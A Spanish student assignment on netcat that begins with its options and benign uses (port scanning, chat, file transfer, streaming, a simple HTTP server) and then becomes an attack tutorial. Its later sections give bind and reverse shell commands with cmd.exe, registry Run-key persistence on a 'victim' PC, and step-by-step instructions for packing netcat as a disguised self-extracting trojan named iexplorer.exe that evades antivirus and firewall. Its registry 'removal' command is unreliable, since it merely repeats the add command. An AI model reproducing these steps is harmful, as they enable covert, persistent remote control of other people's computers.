Trabajo 2 Trimestre
David Menndez Garca
NETCAT
Netcat es un programa en C, en modo consola bastante popular en linux y tambien en windows que sirve para hacer muchas cosas en la red casi tantas como se te ocurran, aqu vamos a explicar algunas de ellas
�Los comandos de netcat son estos
-d Permite que nc trabaje en forma silenciosa y se desenganche del indicador de comandos MS-DOS. -e <comando> Un nc a la escucha podr ejecutar el <comando> en el instante en que alguien se conecte al puerto en el que est escuchando. -i <segundos> Intervalo de espera, que es la cantidad de tiempo que nc esperar entre dos envos de datos sucesivos. -g <lista-de-ruta> Se pueden especificar hasta 8 opciones g en la lnea de comandos para forzar que su trfico nc pase por determinadas direcciones IP. -G <puntero de saltos> Esta opcin le permitir definir que direccin IP va a ser el siguiente salto dentro de la ruta indicada con la opcin g. -l Activa el modo escucha de nc. -L Activa el modo escucha de nc pero con ms inters. -n Indica a nc que no realice ninguna consulta de nombres de hosts. -o <archivohex> Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal. -p <puerto> Le permite especificar el puerto local que va a utilizar nc. -r Nc elegir aleatoriamente los puertos locales y remotos. -s Especifica la direccin IP de origen que deber utilizar nc cuando efectue sus conexiones. -t Es capaz de controlar la negociacin de opciones Telnet. -u Indica a nc que utilice UDP en lugar de TCP. -v Informa el estado de nc, si pones otra v podrs obtener ms informacin. -w <segundos> Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexin. -z Le dice a nc que enve la cantidad de datos necesarias para conocer en que puertos se est escuchando algo
�Netcat como scanner de puertos
Netcat puede mirar a ver si un puerto de un host determinado permite el paso o no o se le puede especificar una lista de puertos (-v sirve para que nos muestre detalles si ponemos dos v nos da mas detalles) nc -v ip puerto nc -v ip 23-1024 (puerto-puerto) nc -vv -z ip puerto > log.txt nc -v host puerto miscosas.txt > log.txt
�Netcat como Chat para dos en cualquier puerto Servidor: nc -l -p puerto Cliente: nc ip puerto
�Netcat para enviar y recibir ficheros
Receptor: nc -l -p puerto > archivo.zip Emisor: nc localhost puerto < archivo.zip
�Streaming Audio y video con netcat
Hay que tener el reproductor madplay o mplayer en la carpeta system32 Servidor: nc -l -p puerto < song.mp3/.mpeg cat *.mp3/.mpeg | nc -l -p puerto Cliente: nc x.no-ip.org puerto | madplay - mplayer -
�Netcat como servidor http
Servidor: nc -vv -L -p puerto < index.html (C:\index.html) el cliente http://ip si es el puerto 80, sino :puerto
�Netcat como Shell remota o cliente telnet Si en una maquina ponemos netcat a escuchar un puerto y con e ofrecemos cmd a quien se conecte el que se conecte a ese puerto tendra shell remota Cliente nc -vv -t ip puerto Servidor nc -l -p puerto -t -e cmd.exe Una vez en su shell podemos crearle usuarios matar procesos usar net cat para subir o bajar archivos, o mediante ftp o net bios y podemos aadirle al registro el netcat para no perder la conexin y que cada vez que reinicie se le cargue el servidor a modo de troyano aadir al registro en pc victima: (tecleado en la cmd remota) el 1000 puede ser cualquiera al igual q el nombre de nc.exe REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\windows\system3\nc.exe -L -d -e cmd.exe -p 1000" borrar del registro: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\windows\system3\nc.exe -L -d -e cmd.exe -p 1000"
�Preparando un servidor de netcat para usarlo a modo de troyano Vamos a usar el Winrar para crear un archivo autoejecutable y que cargue el netcat en modo escucha oculto y ademas lo agregue al registro. Cambiamos el nombre ponemos RAR, compresin la mejor y archivo SFX (autoextraible)
En avanzado damos en opciones SFX (opciones autoextraible segn la versin del winrar)
�en la ruta %homedrive%%homepath%\update (homedrive es la raiz, homepath el directorio del usuario y update una carpeta que no llame la atencin)
En ejecutar tras la extraccin el nombre de nc en este caso iexplorer.exe porque lo hemos cambiado para disimular y los comandos para ponerlo en modo escucha en 127.0.0.1 ponemos nuestra ip o dominio donde queramos que se conecte netcat, yo recomiendo un noip iexplorer.exe -d -e cmd.exe ip 80
En ejecutar antes de la extraccin cargamos la ruta para agregarlo al registro El 127.0.0.1 se cambia lo mismo de antes y el puerto el mismo que este antes o puede ser otro pero hay que acordarse para luego poder poner el nc en nuestro pc y conectar con el puerto que sea. Lo que si es importante es que iexplorer sea el mismo nombre que el nombre del ejecutable (el autoextraible no, el nc original) %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul
�Esto sirve para ocultar todo el proceso de extraccin y ejecucin
Aqu cambiamos el icono por uno de internet explorer por ejemplo o uno que concuerde con el nombre del ejecutable
�El antivirus no se entera
�Lo ideal seria juntar el ejecutable con otro alguna aplicacin y que se ejecuten las dos cosas a la vez pero que solo se vea la aplicacin con un icono acorde, los mejores puertos son el 21, 25 y 80 porque el firewall del xp no salta en ellos. Una vez tenemos shell remota podemos subir algun server de vnc para tener mas control o cualquier server de cualquier programa de administracin remota
